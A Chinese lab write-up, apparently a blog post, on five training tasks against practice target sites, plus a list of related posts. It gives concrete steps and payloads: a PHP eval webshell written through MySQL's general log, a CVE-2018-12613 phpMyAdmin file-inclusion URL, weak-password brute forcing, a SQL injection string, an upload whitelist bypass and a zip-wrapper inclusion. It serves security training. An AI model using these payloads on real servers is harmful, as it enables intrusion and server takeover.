实训Day-1 漏洞攻击实战

目录

[实训任务1 漏洞攻击实战一](#实训任务1 漏洞攻击实战一)

[实训任务2 漏洞攻击实战二](#实训任务2 漏洞攻击实战二)

[实训任务3 白云新闻搜索](#实训任务3 白云新闻搜索)

[实训任务4 手速要快](#实训任务4 手速要快)

[实训任务5 包罗万象](#实训任务5 包罗万象)

总结



今天的实训目的是为了:了解漏洞攻击的一般步骤;掌握SQL注入的基本原理;掌握XSS攻击的基本原理;掌握文件上传的基本原理;掌握文件包含的基本原理;能根据漏洞原理展开攻击。

实训任务1 漏洞攻击实战一

1.打开之后我们先用御剑对这个靶机站点进行扫描

2.可以发现可疑地址phpmyadmin/index.php

3.这里发现了数据库的登录地址,我们弱口令爆破一下得到用户名和密码都是root

4.进数据库之后先查看是否开启日志功能以及日志文件的保存路径,若未开启将其开启

可以利用sql语句
"SHOW VARIABLES LIKE 'general%'"
"set global general_log = "ON";"

5.向日志中写入一句话木马"select '<?php @eval($_POST[1]);?>'"

6.寻找网站在服务器上的绝对地址,由于在linux中mysql数据库的日志与web目录的用户权限是分开的,我们此时还无法通过目录地址访问该日志文件
再次查看我们御剑扫描的后台,发现info.php这里应该存放着各种的版本信息等

打开后可以发现我们的绝对地址
7.执行命令"set global general_log_file=' C://xxx//xxx//xxx//shell.php';"
修改日志文件存储路径和文件名

8.重新写入php一句话木马"select '<?php @eval($_POST[1]);?>'"

9.最后使用webshell管理工具连接创建的shell.php文件,控制服务器。

实训任务2 漏洞攻击实战二

1.第一步和任务一类似先对靶机进行扫描

发现可以可以目录www.zip和phpmyadmin

www.zip可能是由于管理员偷懒,将网站内容定期压缩的来的,因此在www.zip中我们仔细查找后在/common/config发现数据库的账号密码

2.登录网站数据库后,查看数据库管理系统的版本号,为4.8.1
该版本存在安全漏洞。

参考内容:phpMyAdmin 4.8.x 本地文件包含漏洞利用 | Vulnspy Blog

3.利用 CVE-2018-12613 进行 getshell。向 shell.php 文件中写入一句话木马执行SELECT "<?php file_put_contents('shell.php','<?php @eval($_POST[1]);?>');?>"

4.phpmyadmin的session会保存近期执行过的sql语句,F12查看sessionID

5.根据漏洞利用原理:以此构造url如下:http://xxx.xx.xx.xxx:xxx/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_获取到的sessionID

6.使用webshell管理工具连接创建的shell.php文件,控制服务器。

实训任务3 白云新闻搜索

显然这里应该是一个post的sql注入使用' or 1=1发现有弹窗报错

直接F12,F1大法禁用JS

之后按步骤进行注入即可

实训任务4 手速要快

打开要登录,在网络里可以看到password

登录进去后有白名单过滤,将一句话木马文件改为Webshell.php.png上传即可

实训任务5 包罗万象

1.在url中发现有数据,修改upload,确定是个文件包含

2.将一句话木马压缩zip

3.修改url=包含刚刚上传的zip文件,

4.分析报错信息发现zip后还有.php,这时使用%23过滤后发现还存在问题,在%23后加上压缩包里面的php文件名即可

5.再次利用ZIP伪协议解压缩上传的zip文件上传webshell,后获取webshell的实际地址,使用蚁剑连接,查找flag

总结

1.在拿到靶机时首先可以进行目录扫描,查看是否存在可以目录

2.在存在过滤时可以尝试双写等方式绕过

3.存在前端JS过滤时可以直接禁用

相关推荐
一只栖枝4 小时前
网络安全 vs 信息安全的本质解析:数据盾牌与网络防线的辩证关系关系
网络·网络安全·信息安全·it·信息安全认证
安全系统学习4 小时前
【网络安全】Mysql注入中锁机制
安全·web安全·网络安全·渗透测试·xss
CertiK5 小时前
CertiK《Hack3d:2025年第二季度及上半年Web3.0安全报告》(附报告全文链接)
网络
一只小鱼儿吖7 小时前
进程代理单窗口单IP技术:原理、应用与实现
网络·网络协议·tcp/ip
稳联技术7 小时前
Ethernet IP与Profinet共舞:网关驱动绿色工业的智慧脉动
网络·网络协议·tcp/ip
学习3人组7 小时前
CentOS配置网络
linux·网络·centos
~山有木兮8 小时前
LiteHub中间件之限流实现
网络·http·中间件
cui_win8 小时前
【网络】Linux 内核优化实战 - net.core.flow_limit_table_len
linux·运维·网络
深圳安锐科技有限公司8 小时前
深圳安锐科技发布国内首款4G 索力仪!让斜拉桥索力自动化监测更精准高效
运维·安全·自动化·自动化监测·人工监测·桥梁监测·索力监测
潘锦9 小时前
海量「免费」的 OPENAI KEY,你敢用吗?
安全·openai